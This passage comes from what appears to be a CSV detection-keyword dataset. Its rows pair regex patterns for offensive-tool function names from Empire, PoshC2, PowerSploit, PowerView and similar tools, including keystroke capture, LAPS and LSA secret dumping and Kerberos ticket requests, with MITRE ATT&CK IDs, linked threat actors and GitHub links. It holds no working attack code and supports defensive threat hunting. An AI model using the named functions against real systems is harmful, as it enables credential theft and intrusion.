WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46075" "*Get-KeePassXMLFields*",".{0,1000}Get\-KeePassXMLFields.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46076" "*Get-KerberosServiceTicket*",".{0,1000}Get\-KerberosServiceTicket.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 
- T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46077" "*Get-KerberosServiceTicket.ps1*",".{0,1000}Get\-KerberosServiceTicket\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - 
T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46078" "*GetKeyloggerLogsResponse*",".{0,1000}GetKeyloggerLogsResponse.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","46079" "*Get-KeystrokeData*",".{0,1000}Get\-KeystrokeData.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - 
Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46080" "*Get-Keystrokes *",".{0,1000}Get\-Keystrokes\s.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46081" "*Get-Keystrokes*",".{0,1000}Get\-Keystrokes.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1067","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46082" "*get-keystrokes*",".{0,1000}get\-keystrokes.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - 
TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46083" "*Get-Keystrokes*",".{0,1000}Get\-Keystrokes.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46084" "*Get-Keystrokes.ps1*",".{0,1000}Get\-Keystrokes\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - 
T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46085" "*Get-Killdate*",".{0,1000}Get\-Killdate.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS.
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1050","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46086" "*get-killdate*",".{0,1000}get\-killdate.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - 
TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46087" "*Get-KIWI_KERBEROS_LOGON_SESSION*",".{0,1000}Get\-KIWI_KERBEROS_LOGON_SESSION.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","0","N/A","N/A","N/A","2","117","14","2025-03-28T10:49:43Z","2021-12-11T15:24:44Z","46088" "*Get-LAPSPasswords*",".{0,1000}Get\-LAPSPasswords.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - 
CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46089" "*Get-LAPSPasswords.ps1*",".{0,1000}Get\-LAPSPasswords\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46091" "*Get-LastLoggedon -*",".{0,1000}Get\-LastLoggedon\s\-.{0,1000}","offensive_tool_keyword","empire","Empire 
scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46092" "*Get-LastLoggedOn ?ComputerName *",".{0,1000}Get\-LastLoggedOn\s?ComputerName\s.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - 
TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46093" "*Get-LastLoggedOn*",".{0,1000}Get\-LastLoggedOn.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46094" "*Get-LocalGroupMember -Group Administrators*",".{0,1000}Get\-LocalGroupMember\s\-Group\sAdministrators.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46095" 
"*Get-LoggedOnLocal -*",".{0,1000}Get\-LoggedOnLocal\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46096" "*Get-LoggedonLocal -ComputerName *",".{0,1000}Get\-LoggedonLocal\s\-ComputerName\s.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell 
tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46098" "*GetLoggedOnUsersRegistry.cs*",".{0,1000}GetLoggedOnUsersRegistry\.cs.{0,1000}","offensive_tool_keyword","GetLoggedOnUsersRegistry","PoC To enumerate logged on users on a remote system using the winreg named pipe","T1087 - T1018 - T1057","TA0007 - TA0008","N/A","N/A","Discovery","https://gist.github.com/RalphDesmangles/22f580655f479f189c1de9e7720776f1","1","1","N/A","N/A","8","8","N/A","N/A","N/A","N/A","46099" "*getLogger(""NemesisConnector"")*",".{0,1000}getLogger\(\""NemesisConnector\""\).{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","46100" "*Get-LolDrivers*",".{0,1000}Get\-LolDrivers\s.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","46101" "*Get-LsaRunAsPPLStatus*",".{0,1000}Get\-LsaRunAsPPLStatus.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","46102" "*Get-LsaSecret *",".{0,1000}Get\-LsaSecret\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 